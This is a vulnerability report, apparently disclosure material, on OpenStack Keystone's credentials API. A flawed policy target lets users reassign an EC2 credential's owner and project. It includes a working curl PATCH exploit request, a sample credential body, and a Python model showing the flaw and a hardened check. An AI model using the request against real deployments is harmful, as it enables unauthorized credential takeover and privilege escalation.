The "_build_target_enforcement" function checks only for "credential_id" (see https://github.com/openstack/keystone/blob/7bb6314e40d6947294260324e84a58de191f8609/keystone/api/credentials.py#L38).
Thus, even with a '"identity:update_credential": "rule:cloud_admin or (user_id:%(target.credential.user_id)s)"' policy in place, nothing prevents a malicious user from creating an EC2 credential and then changing its owner and project ID, e.g.:
curl -X PATCH https://keystone/v3/credentials/3c2b3265350c6da3a18a143fbe975ca4a8ed88a6f8c6dacc2494a5c1287ba66f -H 'Accept: application/json' -H 'Content-Type: application/json' -H "X-Auth-Token: ***" -d'{ "credential": { "project_id": "_target_project_id_", "user_id": "_target_user_id_" } }'
Additionally, it is possible to create a credential with any existing project_id, though this is not a serious security issue on its own, e.g.:
{
  "credential": {
    "blob": "{\"access\": \"ffe6fc21b47c4d87befc95ad070c3b7a\", \"secret\": \"530196cd097e4a7ca9df7258aa89ff0e\", \"trust_id\": null}",
    "id": "3c2b3265350c6da3a18a143fbe975ca4a8ed88a6f8c6dacc2494a5c1287ba66f",
    "project_id": "_any_project_id_",
    "type": "ec2",
    "user_id": "_my_user_id_"
  }
}
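The two cases above (reassigning an existing credential and creating one bound to a foreign project) share one root cause: the policy target is built from the stored credential, so the owner passes the check, while the user_id/project_id proposed in the request body are never authorized. The following is an added model of that update/create path, not Keystone's code; the store, token shape, helper names and the "own user and token project" rule used for the hardened step are constructed assumptions.

```python
# Added illustration (not Keystone's own code). The policy check on the
# *existing* credential passes for its owner; unless the proposed new
# owner/project is also checked, the owner can hand the credential to anyone.
import copy

def _owner_or_admin(actor, credential):
    """Stand-in for 'rule:cloud_admin or user_id:%(target.credential.user_id)s'."""
    return "admin" in actor["roles"] or credential["user_id"] == actor["user_id"]

def _new_owner_allowed(actor, user_id, project_id):
    """Hardened step (an assumption, not Keystone's exact fix): a non-admin may
    only bind a credential to their own user and their token's project."""
    if "admin" in actor["roles"]:
        return True
    return user_id == actor["user_id"] and project_id == actor["project_id"]

def create_credential(store, actor, body, check_new_owner=True):
    cred = {"user_id": body["user_id"], "project_id": body.get("project_id"),
            "type": body.get("type", "ec2")}
    if check_new_owner and not _new_owner_allowed(actor, cred["user_id"], cred["project_id"]):
        raise PermissionError("cannot create a credential for that user/project")
    store[body["id"]] = cred
    return cred

def update_credential(store, actor, credential_id, patch, check_new_owner=True):
    existing = store[credential_id]
    if not _owner_or_admin(actor, existing):          # the check the policy already does
        raise PermissionError("not the owner")
    updated = copy.deepcopy(existing)
    updated.update(patch)                             # PATCH body applied verbatim
    if check_new_owner and not _new_owner_allowed(actor, updated["user_id"], updated["project_id"]):
        raise PermissionError("cannot reassign credential to that user/project")
    store[credential_id] = updated
    return updated

def demo():
    """Replays the reported sequence without and with the extra check.
    Returns {False: <owner after PATCH>, True: 'denied'} for a constructed user."""
    mallory = {"user_id": "mallory", "project_id": "proj-m", "roles": ["member"]}
    results = {}
    for hardened in (False, True):
        store = {}
        create_credential(store, mallory,
                          {"id": "c1", "user_id": "mallory", "project_id": "proj-m"}, hardened)
        try:
            update_credential(store, mallory, "c1",
                              {"user_id": "victim", "project_id": "proj-v"}, hardened)
            results[hardened] = store["c1"]["user_id"]
        except PermissionError:
            results[hardened] = "denied"
    return results
```

Running demo() shows the ownership transfer succeeding when only the target-based rule is evaluated and being refused once the requested user_id/project_id are checked against the caller's token.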